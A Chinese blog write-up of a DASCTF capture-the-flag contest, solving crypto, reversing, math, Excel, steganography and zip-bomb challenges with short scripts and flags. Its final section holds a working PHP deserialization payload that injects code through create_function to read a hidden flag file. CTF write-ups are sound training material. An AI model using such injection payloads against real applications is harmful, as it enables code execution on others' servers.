dasctf sept X 浙江工业大学秋季挑战赛

本文最后更新于:2 年前

参与者:

  1. 雪晴师傅
  2. m1n9yu3

签到

网鼎杯青龙组原题 https://tieba.baidu.com/p/6671953167 

1
2
3
4
5
6
7
8
m = 73964803637492582853353338913523546944627084372081477892312545091623069227301
c = 21572244511100216966799370397791432119463715616349800194229377843045443048821
n = 2** 256

e=discrete_log(c,mod(m,n))

print(e)

e = 34852863801130149185238904762083023615101

b’flag{DASCTF_zjut}’

ea5ycpp

直接猜出来的

1
2
3
4
5
6
d = [  0x68, 0x6F, 0x65, 0x6C, 0x81, 0x69, 0x7A, 0x3D, 0x3B, 0x79,
  0x6B, 0x73, 0x38, 0x39, 0x7B, 0x70, 0x7B, 0x48, 0x73, 0x7C,
  0x85, 0x47, 0x7C, 0x96]
for i in range(len(d)):
    print(chr(d[i] - 2 - i), end='')

pig_brain_king

img

点了 1000 次 累死了 直接 patch 判断是否成功的地方

img

image-20210926113052815

然后疯狂的 点 1 然后回车

easy_math

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#!/usr/bin/python3 
# coding = utf-8  
from z3 import *   
s = Solver()  
x = Int("x") 
y = Int("y") 
z = Int("z") 
c = Int("c")  
s.add(x-c==107010778014077) 
s.add(y-c==379654844783) 
s.add(z-c == 104686361407310) 
s.add(c+z+y+x == 212351672173114)  
s.check() 
print(s.model())

直接 z3 解方程 拿到

image-20210926113128180

然后拼接一下

image-20210926113214509

flag{he11o_F1boNacci!}

Girlfriend’s account

两个 payload

1
2
3
=SUM(ISNUMBER(SEARCH(TEXT({1,2,3,4,5,6,7,8,9},"[dbnum2]"&{"0亿";"0仟!*万";"0佰!*万";"0拾!*万";"0万";"万!*0仟";"万!*0佰";"万!*0拾";"0元";"0角";"0分"}),IF(ISERR(FIND("万",A2)),"万",)&A2))*{1,2,3,4,5,6,7,8,9}*10^{8;7;6;5;4;3;2;1;0;-1;-2}) 

=IF(B3="壹",1,IF(B3="贰",2,IF(B3="叁",3,IF(B3="肆",4,IF(B3="伍",5,IF(B3="陆",6,IF(B3="柒",7,IF(B3="捌",8,IF(B3="玖",9)))))))))

flag{12305926.36}

双目失明,身残志坚

盲水印解开, 然后 拼音盲文对照表

image-20210926113243026

image-20210926113318937

zh e j iang g ong ie d a x ue

flag{zhejianggongyedaxue}

ZipBomb

这题问的雪殇师傅

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
import os.path
import zipfile
import re
dir_path='C:\\Users\\Snowywar\\Desktop\\zipBomb'
files= os.listdir(dir_path)
newfiles = files[::-1]
print(newfiles)
setee = []
for file in newfiles: #遍历文件夹
    position = dir_path+'\\'+ file #构造绝对路径,"\\",其中一个'\'为转义符
    print (position)           
    z = zipfile.ZipFile(position, 'r')
    for filename in z.namelist():
        bytes = z.read(filename)
        if b'Zmxh' in bytes:
            print(filename)

image-20210926113351957

image-20210926113434263

flag{F!nD_Fl4g_1n_2IP_13OMB}

hellounser

payload 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php
/**
 * @Author: ying
 * @Date:   2021-09-25 13:41:23
 * @Last Modified by:   ying
 * @Last Modified time: 2021-09-25 20:42:24
 */
class A {
    public $var;
    public function __construct(){
        $this->var = new B();
    }
}
class B{
    public $func;
    public $arg;
    public function __construct(){
        $this->func = "create_function";
        // $this->arg = "}var_dump(get_defined_vars());//";
        $this->arg = "}require(base64_decode(VHJ1M2ZsYWcucGhw));var_dump(get_defined_vars());//";
    }
}
echo urlencode(serialize(new A()));


一键打出来

ctf

本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!